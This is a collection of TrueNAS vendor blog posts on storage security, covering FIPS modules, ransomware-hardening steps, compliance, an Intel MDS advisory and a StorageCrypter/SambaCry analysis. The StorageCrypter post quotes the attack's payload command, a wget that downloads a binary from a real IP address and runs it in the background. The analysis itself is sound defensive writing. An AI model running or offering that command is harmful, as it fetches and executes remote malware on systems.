TrueNAS continues to receive new and enhanced security features and tools with each release. TrueNAS Enterprise, as well as the free open source TrueNAS editions, are becoming increasingly sophisticated in protecting data from a wide variety of threats. Also, more users are deploying TrueNAS to meet retention and reporting requirements for compliance. To build on this foundation,  we are introducing TrueSecure^TM, an optional FIPS 140-validated crypto module for TrueNAS Enterprise appliances and launching the updated TrueNAS security site.

Secure by Design

Storage vendors at the lower end of the market, like QNAP and Synology, have made some design decisions that favored ease of use over security which have subjected their users to continual virus and ransomware attacks. By contrast, enterprise storage products like TrueNAS must be built with security as a primary design principle so that they can integrate into secure network environments and minimize attack vectors against data.

However, new threats come online with such frequency that new features and tools will always be needed to stay ahead of the curve. With TrueNAS SCALE 22.12.3, we introduced a FIPS 140-3 validated crypto module and the option to enable TrueSecure on Enterprise appliances.

New Security Page Provides Enhanced Protection

Infrastructure and data can be better protected with knowledge of all vulnerabilities. The updated TrueNAS Security site now includes a detailed Software Bill of Materials (SBOM) for TrueNAS and provides detailed documentation on all known security vulnerabilities and CVEs. This is done with regular and automated security auditing. Please explore the information which also provides links to the relevant Open Source repositories and planned fixes.

TrueNAS Security Features are Extensive

In a short blog, it is impossible to explain every feature under the umbrella of “security” and why each is important. With ransomware being top of mind in 2023, security features specific to ransomware protection are summarized in this recent blog. The chart below tries to capture the key categories of security-related features in TrueNAS. If you need more information, visit the TrueNAS Security site.

No amount of storage-level security will make up for not following network and general IT best practices. For example, we do not recommend directly attaching TrueNAS to the Internet without a robust firewall. Services like Active Directory and LDAP are also recommended for password administration. By following network security best practices, TrueNAS is more secure.

Backdoor access to storage is an attack vector that concerns users around the world. Whether left vulnerable by a public sector organization or a private business, backdoor access represents a target for both state-sponsored and private malicious actors. TrueNAS can be configured to strictly control access, and unlike proprietary storage vendors, all of the software that enforces those controls is open and reviewable.

TrueNAS SCALE Bluefin Enhances Security

With TrueNAS SCALE Bluefin’s release last year, there have been many security advancements:

Rootless administration allows changing away from using the commonly known “root” username and instead setting up your own unique administrator usernames and passwords.

OpenZFS snapshot retention tags can prevent snapshots from being deleted, remaining on the system permanently as a restore point. This provides additional protection against ransomware by allowing the administrator to make a decision on when it is safe and appropriate to remove the snapshot outside of normal retention policies.

API Keys with ACLs are laying the groundwork for future Role-Based Access Control (RBAC) enhancements in coming releases. This allows further fine-grained control over assigned API key privileges.

2-Factor Authentication (2FA) verifies the identities of administrators using Google Authenticator or any Time-based One-Time Password (TOTP) compliant authentication application. This feature also exists in TrueNAS 13.0.

iX-Storj Globally Distributed Storage is primarily cost-effective cloud storage, but it inherently protects data by encrypting it on the TrueNAS system before distributing the data via erasure coding over a global network. Thanks to the combination of zero-trust and zero-knowledge encryption in use, no storage provider or government entity has access to your private data stored on iX-Storj, so your data remains yours alone.

Introducing 

Government agencies often require specific security and compliance measures in both software and hardware which are not normally required in other businesses. TrueSecure is an optional package available in TrueNAS Enterprise (SCALE 22.12) that delivers specific benefits to Government organizations. Our goal is to comply with the requirements of the NIST Cybersecurity Framework and make this additional security as cost-effective as possible. These capabilities are also the basis of international support for ISO 27001.

Many security capabilities will find their way into TrueNAS, but some of these will be specific to TrueSecure. TrueSecure provides the following capabilities:

FIPS 140-2 validated storage media provide highly secure Data-at-Rest capabilities. Both HDD and SSD (SAS or NVMe) drives can be provided on standard TrueNAS Enterprise systems. These drives are similar to self-encrypting drives (SED) but include tamper-proof mechanisms for additional security.

FIPS 140-3 validated software encryption module provides highly secure Data-in-Transit capabilities. The validated encryption algorithms are more secure than the current open source algorithms and validated for use in critical Federal use-cases. For example, these algorithms will protect administration and data replication tasks.

Key Management Interoperability Protocol (KMIP) provides the capability to centralize the management of SED and ZFS encryption passwords for larger organizations. This capability is also in TrueNAS Enterprise 13.0.

With TrueSecure, iXsystems is actively working to maintain NIST 800-171 Compliance, which is the preferred approach for USA Government entities to manage their cybersecurity. It is a comprehensive and well structured approach that iXsystems is adopting, along with the TrueNAS product requirements. Any additional capabilities needed are being added to TrueSecure, if not in the general TrueNAS products. iXsystems is also developing Security Technical Information Guides (STIGs) for use with TrueSecure to help lockdown TrueNAS Enterprise systems and ensure secure operation.

TrueNAS Enterprise 22.12 is not only secure storage, it can be configured for government-grade security. With the Cobia release later in 2023, new features and tools will continue to enhance security. Areas being actively invested include file change auditing, virus scanning, and additional ransomware prevention. Stay tuned for more information which will be available as Cobia enters its BETA phase in Q3.

If you’d like to speak with iX about any TrueNAS system or security needs, please contact us.

The post TrueNAS is Secure Storage appeared first on TrueNAS - Welcome to the Open Storage Era.

End-user training campaigns for phishing awareness can mitigate the risk of a perimeter breach, but persistent attempts from advanced or state-sponsored attackers can leverage remote exploits that don’t require user interaction. The first line of defense for any device or system on a network is the network itself. Following security best practices for endpoint and perimeter security is the foundation of ransomware protection. When properly configured on a secure network, TrueNAS further protects your data from ransomware.

TrueNAS offers multiple levels of protection against ransomware, including snapshots, native encryption, authentication,and containerization, just to name a few. And, of course, the code is open source which makes it easily auditable and continuously has eyes on it.  With TrueNAS SCALE appliances from iXsystems and TrueCommand, additional layers of protection are available including FIPS 140-3 compliant cryptography modules, limited user permissions during replication, client-side role-based access controls (RBAC) and much more.

Below, we’ll identify some best practices for securing and hardening your TrueNAS SCALE installation against a malicious actor attempting to deploy ransomware.

Install the Latest TrueNAS Updates

As with any software, staying up-to-date with the latest version of TrueNAS will allow you to receive the latest feature enhancements, bug fixes, and security patches. Updates can be performed through the web UI under the System Settings and Update menu, or downloaded separately from the TrueNAS CORE or TrueNAS SCALE download pages and manually installed on your system.

TrueNAS Ransomware Configuration

Set up Recurring Snapshots for your Data

All versions of TrueNAS support copy-on-write OpenZFS snapshots, which prevent data in the snapshots from being encrypted in a ransomware attack. Use the Data Protection tab in TrueNAS SCALE to configure one or more Recurring Snapshot tasks. Because only changed data is saved, snapshots can be taken frequently, giving you a shorter Recovery Point Objective (RPO) for your continuity plans.

Set a Long Retention Time on your Snapshots

As TrueNAS data and snapshots are stored in a copy-on-write manner, the overhead of retaining multiple layers of snapshots is significantly reduced compared to traditional filesystems. With TrueNAS, daily or weekly snapshots can be held for months or years.

Replicate to a Second TrueNAS System

Replicating your data to a second TrueNAS system offers an important second layer of protection against ransomware. This not only involves a logical separation of permissions, as different physical disks are used to store the data, but without permission to write directly to this second system, ransomware cannot modify the contents. A second TrueNAS system also offers a number of other benefits including insurance against downtime from power outages or a natural disaster in your datacenter.

Set Separate Administrative Passwords

Having two identical copies of your data on different systems is good; having two identical administrative passwords on different systems a little less so. Using different passwords on different TrueNAS systems can prevent a single credential compromise from impacting multiple storage systems, and ensures that replicated copies of data remain secure.

Use Pull Replication

When configuring replication, the direction of replication implies the direction of authentication. When properly configured, pull replication means that your second TrueNAS server doesn’t automatically trust your primary server. Even if a malicious actor compromises an administrative user on the primary storage, there is no path for it to authenticate against the second server and remove the replicated snapshots there.

Increase your Snapshot Retention Times on the Destination System

When configuring the pull replication task, set the retention time to a Custom value. Increasing the retention time, based on the available capacity of your secondary system, will allow you to retain an even greater number of snapshots for more granular and longer-term recovery.

Configure Two-Factor Authentication (2FA) for Administrators

To help safeguard against accidental compromise of an administrative account, set up two-factor authentication on your source and destination systems. TrueNAS uses the Time-based One-Time Passwords (TOTP) standard for 2FA, so any mobile application capable of receiving the token can be used as the second factor.

Use a Separate Replication Network

Keeping your replication traffic separate from regular network traffic is a best practice which allows for better monitoring of traffic volume as well as increased performance by removing contention between network interfaces.

Isolate the Second System on your Network

Once configuration of the replication job is finished, configure a firewall or network device to prevent new inbound connections to your secondary system. With pull replication, the secondary system initiates the SSH connection, and only traffic on established sessions is permitted to return. When administrative access to the secondary system is required, a single system or network can be allowed temporary access through the firewall to the web interface.

Lock down the Local Console on Both Systems

Both logical and physical security should be considered for your TrueNAS systems. Securing your systems in a locked room with controlled access is important to prevent physical access. To further mitigate the risks by requiring an administrative login to access the physical console of your TrueNAS system, navigate to the System and Advanced menu in the UI, and ensure that “Show Text Console without a Password Prompt” is unchecked.

Additional Security Options Available with TrueNAS SCALE

FIPS 140 with TrueSecure^TM

TrueSecure is an optional package for TrueNAS Enterprise customers running 22.12. It delivers specific benefits to government and other organizations who require this additional compliance. This includes FIPS 140-2 validated drives (HDD, SAS SSD, NVMe SSD), which are similar to self-encrypting drives (SED) but include tamper-proof mechanisms for additional security. Also available is a module for FIPS 140-3 validated software encryption for highly secure Data-in-Transit.

Use a Non-Root Login for Administration

When installing TrueNAS SCALE, select the option to use a separate administrative account for web-based administration. If SCALE has already been configured for use with root installation, or the system was migrated from TrueNAS CORE, follow the instructions in the TrueNAS Docs under Using Rootless Login to disable the root account’s interactive login.

Configure a Limited User Account for Replication on your Source System

TrueNAS SCALE allows for a limited user account to be used when authenticating for replication purposes. By following the steps presented in section 8 of the TrueNAS SCALE Evaluation Guide, a user can be created for the sole purpose of replication. This user cannot authenticate to the TrueNAS SCALE webUI, connect to network shares, and may only login via a shared SSH key.

Hold and Lock your Most Important Snapshots

TrueNAS SCALE offers an additional layer of protection for your important snapshots with OpenZFS snapshot retention tags. Snapshots set up with one or more active retention tags cannot be deleted without releasing the retention holds, and will not be removed at the end of the normal retention period. Unless removed by an administrator, they will remain on the system permanently as a restore point.

For more information on TrueSecure and the security features of TrueNAS SCALE, check out our latest Secure Storage blog.

We are Here to Help

As long as ransomware continues to be a viable revenue stream for bad actors, attacks on companies are likely to continue. When properly configured, TrueNAS can help protect your data and your company from being held for ransom.

If you’re interested in learning more about how TrueNAS can help in the fight against ransomware, visit us at https://www.truenas.com/contact-us/ or give us a call at 1-855-GREP-4-IX.

The post Level Up your Ransomware Protection with TrueNAS appeared first on TrueNAS - Welcome to the Open Storage Era.

While mail services going to and from the country resumed in full capacity after nearly six weeks, the impact of this attack is still being felt by the Royal Mail and beyond. Much of the UK’s business ecosystem dealt with delays connected to the attack over a month later. An attack on data puts lives and businesses on hold, losing significant amounts of time, money, and peace of mind.

With TrueNAS, you get the data-integrity features of the OpenZFS file system, with exabytes of data protected. All versions of TrueNAS, from the freely available CORE and SCALE to the Enterprise edition included on iXsystems hardware, allow for the creation of a nearly unlimited number of “copy on write” snapshots. The scheduling, creation, and management of snapshots are controlled by the TrueNAS appliance and OpenZFS file system – both legitimate users and malicious malware remotely accessing the shared folders have no way to damage them, either inadvertently or deliberately.

Ransomware may attempt to create encrypted versions of the new files and delete the old ones; however, with TrueNAS, the older, original files will always remain accessible through the OpenZFS snapshot technology. Once your company’s information security team has identified and removed the active malware, recovering from a ransomware attack can be as simple as rolling back the encrypted files or folders to the previous version.

A new generation of ransomware is rising, aimed at targeting hypervisors. With TrueNAS, you remain protected from the newest tactics thanks to an optional integration with VMware snapshot technology. This technology is designed for consistent point-in-time images of critical virtual workloads, ensuring that your data is safe.

TrueNAS offers even more protection against ransomware by using OpenZFS replication to create additional copies of the snapshots on separate systems. This includes “PULL” style replication, where the source machine has no authentication connection to the next level of backup – ensuring that even if an administrative user’s credentials are compromised, the remote system will remain unaffected.

Our world runs on data and it is now more important than ever to protect valuable information from malicious pirates. Ransomware attacks are hard to predict, but may be prevented with the right technology. TrueNAS provides a first and second line of defense against ransomware attacks, giving the TrueNAS community peace of mind.

To learn how to protect your data against ransomware attacks using TrueNAS, contact an iXsystems representative.

Contact Us

Read more on the use of TrueNAS in a Zero-trust Architecture here:
https://www.truenas.com/blog/using-truenas-in-a-zero-trust-architecture/

Read more about combating ransomware with TrueNAS here:
https://www.truenas.com/blog/combating-ransomware-with-truenas/

The post Royal Mail Cyber Incident appeared first on TrueNAS - Welcome to the Open Storage Era.

Governments cannot be expected to solve this problem, and in fact may penalize you for paying a ransom to “terrorists”. IT decision makers must urgently look outside of their standard toolkit because hackers are always looking for new attack vectors to compromise systems. iXsystems TrueNAS offers a robust approach to combating ransomware that embraces mainstream IT solutions while providing additional layers of security that can be integrated into any organization’s ransomware protection strategy.

The Nuts and Bolts of Ransomware

A large portion of systems that fall victim to ransomware are running Microsoft Windows and rely on Windows technologies such as Group Policy and the Volume Shadow Copy Service (VSS) to keep intruders at bay and mitigate the damage they do. While this approach will prevent some attacks, these approaches often miss the most common yet nefarious ransomware attack vector: a privileged user downloading unintentional malware that infects and encrypts every resource that they have access to. The more privileged the user, the more damage they can inadvertently cause — up to full and total destruction performed with Administrative access.

In addition to user workstations, consumer-grade NAS systems such as QNAP, Synology, and WD CloudNAS have also fallen victim to high-profile and widespread ransomware attacks. NAS systems like these that are Internet accessible are particularly vulnerable. Where built-in applications and services have root access to the system, each application enabled makes the whole system more vulnerable. Extreme care should be taken before exposing any storage service to the internet, and if required, should be done using a variety of techniques such as incorporating VPNs, Encryption, and two-factor authentication (2FA).

Additionally, many high-profile targets are compromised and analyzed months in advance before a ransomware attack. Adversaries perform reconnaissance to identify and target backup strategies and identify anything that provides an advantage when launching their attack. If necessary, reinforce your network security tools and procedures as they are often the first defense for your storage security.

Ransomware Payments Should be Your Last Resort, Not Your First

The true secret to combating ransomware is to treat it like any other threat to your data and build a robust storage infrastructure that can provide end-to-end data integrity with rapid restoration capabilities. This is where TrueNAS with its OpenZFS file system helps safeguard exabytes of data across the globe from not only ransomware but also the traditional threats that a good data protection strategy is designed to address. From user error to bit rot, you should be ready for anything, and TrueNAS provides key capabilities that give you an upper hand against all risks to your data, including:

• Bitrot protection, thanks to continuous filesystem checksumming
• Redundancy, thanks to flexible volume configuration
• Protection from disrupted writes thanks to a “copy-on-write” design
• Instant point-in-time, immutable backups thanks to snapshots
• Fully-validated bit-level backup thanks to snapshot-based replication
• Optional dataset or full-disk encryption for privacy and compliance
• Optional high-availability for robust service delivery
• Cloud backup integration with all leading providers
• Replication and backup to non-TrueNAS hosts via rsync
• Windows malware immunity thanks to Unix operating systems
• SMB share protection with WORM profile options

TrueNAS Goes the Extra Mile for Data Security

In practice, a network of TrueNAS systems deliver industry-standard sharing protocols including SMB, NFS, iSCSI, AFP, and FTP to servers and workstations with the key difference being that essential data protection operations are invisible to users and out of reach of known ransomware. Should a connected system be infected, the administrator can selectively roll back the impacted storage and optionally clone the infected state for forensic analysis. Backup operations also take place transparently to users and are online for continuous inspection with optional air-gapping. This infrastructure can be further secured with:

• Tightly restricted Internet access with OpenVPN options for remote access
• Third party Application protections via industry standard containerization technologies
• Role-based Access Control (RBAC) and auditing with TrueCommand
• End-to-end encrypted administrative access
• Least-privileged Active Directory joining authority
• Optional two-factor authentication for administrative access, including UI and SSH

Isn’t Open Source a Security Disadvantage?

Quite the contrary. Having source code open and available provides significant benefits to security that closed-source products can’t provide. TrueNAS is backed by one of the largest Open Source communities today, the TrueNAS Community, who actively help with specifying requirements, development, validation, and field testing of the software. TrueNAS software is also completely open for transparency and external review to avoid the types of hacks that have become the norm for many closed-source pieces of software.

Time to Take Preventative Action with TrueNAS

Ransomware is a pervasive and evolving threat, but it does not change the fundamental rules and responsibilities of data protection. The TrueNAS family by iXsystems offers flexible storage solutions ranging in size from a few terabytes to many petabytes, with a comprehensive set of security tools, a unified user experience, and up to 24/7 technical support. For up to date information on TrueNAS security information, users should visit security.truenas.com.

Whether you are using TrueNAS CORE, Enterprise, or SCALE, TrueNAS provides the tools needed for data security. The TrueNAS Community Forum is an excellent place to discuss any concerns or ask questions of other experienced users. Contact iXsystems when you are ready for professional support to build secure data infrastructure for your organization.

The post Combating Ransomware with TrueNAS appeared first on TrueNAS - Welcome to the Open Storage Era.

Data and systems security is important to every business. The cost of security breaches can be extremely high and consumes IT administration resources. The best strategy is to avoid and minimize those breaches.
TrueNAS and FreeNAS provide many features to assist with security issues. Unlike other storage systems, the software is Open Source and enables anyone to audit the source code and report back to iXsystems about any potential vulnerabilities. iXsystems will then privately investigate, fix any vulnerabilities, and make our community aware how to best address the issues.
The new TrueNAS Security Hub empowers you with the information you need to maintain the security, integrity, and availability of your data in the midst of possible threats to your IT infrastructure such as vulnerabilities, malware, and ransomware.

The hub includes CVEs (“Common Vulnerabilities and Exposures”: publicly known information on security vulnerabilities and mitigations), errata (technical descriptions of unintended faults in hardware and/or software components), and articles (notices and best practices for security issues regarding TrueNAS and TrueCommand).

The hub also includes security information for FreeNAS and the upcoming release of TrueNAS CORE 12.0. For home and small business users, the goal is to make the latest software robust enough that using the hub is unnecessary.

For Security Officers, there is also a security white paper which details how security and privacy practices have been applied to TrueNAS. To obtain a copy of the white paper, please send an email to security-info@ixsystems.com.

We hope these newly available resources are beneficial to the community and provide System Administrators with the tools to operate their storage systems in a safe and secure manner. iXsystems is constantly improving the TrueNAS software, and there are already several more security features slated to be included in TrueNAS 12.0. To report a potential product-related privacy or security issue (incident, breach or vulnerability), please contact our Security Team at security[at]ixsystems.com.

Visit the TrueNAS Security Hub today for the latest in TrueNAS and FreeNAS security info.

The post iXsystems Introduces New TrueNAS Security Hub appeared first on TrueNAS - Welcome to the Open Storage Era.

Advisory from Intel:

Intel would like to address a new group of vulnerabilities called Microarchitectural Data Sampling (MDS). These were first found by Intel and then independently reported to Intel by security researchers. The MDS vulnerabilities include techniques which exploit speculative operations accessing data in microarchitectural structures within the CPU to expose bits of information through a side channel. Please note, these structures are small and frequently overwritten. However, with a large enough data sample, time, or control of the target system’s behavior, MDS may provide an attacker with access to data that they should not be able to see. It is also important to note that Intel is not aware of any real world exploits of these vulnerabilities.
Intel has addressed MDS in hardware starting with select 8th and 9th Generation Intel® Core™ processors and the 2nd Generation Intel® Xeon® processor Scalable family.
To address MDS in other products, Intel released microcode updates on May 14th, 2019 that are being delivered through firmware updates from system manufacturers. The microcode updates are coupled with corresponding updates to operating systems and hypervisor software. Together, these changes will help keep systems protected. However, these changes may not fully protect systems that use Simultaneous Multi-Threading (SMT). Customers that use these systems should consider how they utilize SMT, guidance from operating systems and virtual machine vendors and their own environment. Because these factors vary considerably, Intel is not recommending that Intel® Hyper-Threading Technology (Intel® HT Technology) be disabled, and it’s important to understand that disabling Intel HT Technology does not alone provide protection against MDS.
You can find more information and other resources regarding MDS at www.intel.com/securityfirst.

The post Intel MDS CPU Vulnerability Advisory appeared first on TrueNAS - Welcome to the Open Storage Era.

The TrueNAS Privacy and Security Compliance Features white paper is here to help decision makers quickly reference key TrueNAS features with industry-specific regulations that often carry stiff penalties for compliance failures. The broadest of these regulations, the Payment Card Industry Data Security Standard (PCI DSS), applies to any business that handles customer credit cards and mandates their encrypted storage. To help meet this requirement, TrueNAS provides software and hardware-level encryption with integrated key management.

To meet the global obligations of the European Union General Data Protection Regulation (GDPR), TrueNAS offers dataset-level user separation that extends throughout the replication process. With appropriate planning, complying with a user’s “right to be forgotten” can be as simple as deleting their dedicated dataset and its replicas.

To meet the requirements of the medical industry, such as HIPAA and ePHI, TrueNAS adds continuous data integrity validation, data-at-rest and in-flight encryption, and immutable snapshots to mitigate data tampering. For increased encryption performance, TrueNAS also offers TCG OPAL 2.0/AES 256-bit Self-Encrypting Drives (SEDs) and optional FIPS 140-2-compliant SEDs for military-grade data-at-rest protection.

Download the TrueNAS Privacy and Security Compliance Features white paper to learn more about how TrueNAS can play a key role in your regulation compliance strategy. Contact us at sales@ixsystems.com, 1-855-GREP-4-IX (1-855-473-7449) or 1-408-493-4100 (outside the US) to discuss your compliance needs with one of our Solutions Architects. 

The post iXsystems White paper: TrueNAS Privacy and Security Compliance Features appeared first on TrueNAS - Welcome to the Open Storage Era.

The StorageCrypter Ransomware appears to be targeting NAS systems around the world but the facts surrounding it have been somewhat confusing. Let’s look at why your TrueNAS and FreeNAS systems are not vulnerable to this specific attack and how to further protect yourself from this category of attacks.

Hats off to the most buzzword-loaded headline of the year: “StorageCrypt Ransomware Infecting NAS Devices Using SambaCry”. You shouldn’t have much trouble finding the article or the dozens of reproductions of it but you may have trouble determining exactly what the real-world risks of the “StorageCrypt” ransomware are and if they can impact you as a FreeNAS or TrueNAS user. The various articles suggest that “StorageCrypt” is:

• Linux ransomware that executes on a storage system
• Windows ransomware that executes on a connected client
• Cryptocurrency mining software
• An encryption product for Windows
• Also known as StorageCrypter

First off, the “StorageCrypt” ransomware does not appear to have anything to do with the StorageCrypt encryption software found at storagecrypt.com. This naming collision appears to be the result of sloppy journalism and “StorageCrypt ransomware” now wins the search battle against the more-correct “StorageCrypter ransomware”. I will use “StorageCrypter” going forward out of respect for the StorageCrypt authors.
From there, I cannot help but notice that every website relating to “StorageCrypter” is more or less part of Windows-oriented advertising networks for antivirus/anti-ransomware tools, articles, and tutorials, many of which blur the line between the “download” links of articles and “Download NOW!” advertisements. I consider this approach irresponsible given how many of these links are clickbait for what may, in turn, be mildly-malicious adware and spyware. I do however appreciate the clear reminder of why I have never run Microsoft Windows.

What we know about StorageCrypter
The known StorageCrypter victims are finding their files renamed with the “.locked” extension and a ransom note entitled “_READ_ME_FOR_DECRYPT.txt” containing information on what has happened and how to get the files back. Some users also see a Windows executable named “美女与野兽.exe” which translates to “The Beauty and the Beast”, accompanied by an Autorun.inf to launch it. Two reported vulnerable NAS systems are the Thecus 7710G NAS and the Western Digital MyCloud EX4100, the first of which is Intel-based and the second ARM-based, both running GNU/Linux. Both Thecus and Western Digital have issued software updates to address the issue, as have Cisco, NETGEAR, QNAP and Synology, Veritas and NetApp as a precaution.

As for how these systems were attacked, at least one user confessed, “I exposed my WD MyCloud to the internet via port forwarding on my router”. Doing this is indeed a plausible vector for the “SambaCry” vulnerability to take advantage of the Samba SMB service version 3.5.0 through versions 4.6.4, 4.5.10 and 4.4.14. “SambaCry”, or more accurately CVE-2017-7494, allows a carefully-crafted Samba shared library to be injected over network port 445 provided that the attacker can guess the path to a writable share. If these required criteria are met and the shared library is executed by Samba, the attacker can execute shell commands on the target system with the permissions of the smbd process. In the case of StorageCrypter, those commands appear to be ‘wget -O /tmp/apaceha http://45.76.102.45/sambacry && chmod -x /tmp/apaceha &&nohub /tmp/apaceha >/dev/null 2>&1 &’ which downloads and executes a binary named “sambacry” that is renamed to “apaceha”. According to one source, this payload is a downloader of other payloads that could be as simple as the “美女与野兽.exe” landmine for Windows users to step on but this has not been confirmed. Running the program would execute the ransomware on the connected Windows system, encrypting all accessible files on the NAS system and possibly other locations such as local disks.

What does this mean for FreeNAS users?
FreeNAS systems later than 9.10.2-U4 are not vulnerable to SambaCry. In addition, unlike the commodity NAS systems described above, FreeNAS:

• Does not run GNU/Linux, significantly reducing its attack surface
• Does not have any default SMB sharing paths, slowing an attack
• Could mitigate the ransomware aspect of the attack with OpenZFS snapshots
• Should, as with any NAS, never be exposed to the Internet in the first place

Just as with any ransomware attack that directly targets network shares, OpenZFS snapshots in FreeNAS and TrueNAS are a proven means of quickly recovering from the damage done by the attack and avoiding payment of a ransom. Unfortunately, the StorageCrypter attack marks a shift from ransomware relying on users falling for attractive phishing bait to automated attacks that exploit software vulnerabilities. Attackers have not yet set their sights on OpenZFS snapshots when launching ransomware attacks but you should start protecting yourself in case they do:

• Never expose your FreeNAS or TrueNAS storage system to the open Internet like the 350,000 Samba users who are at this very moment!
• If you need to grant remote access to your system for administrative reasons such as remote replication, do so using a combination of a GeoIP-aware firewall and a Virtual Private Network
• Set the “exec=off” OpenZFS property on your shares to prevent malware execution

The FreeNAS engineering team is watching this situation closely and is always looking for opportunities to further secure FreeNAS and TrueNAS. Watch the Why we Love ZFS & You Should Too and Defeating Ransomware with TrueNAS webinars to find out more about OpenZFS and how to use OpenZFS snapshots to protect yourself from attacks like StorageCrypter.
Michael Dexter
Senior Analyst

The post StorageCrypter Ransomware: Security Threat or Clickbait? appeared first on TrueNAS - Welcome to the Open Storage Era.

The post Security Alert: All users need to upgrade to the latest release (0.7.2.5543) appeared first on TrueNAS - Welcome to the Open Storage Era.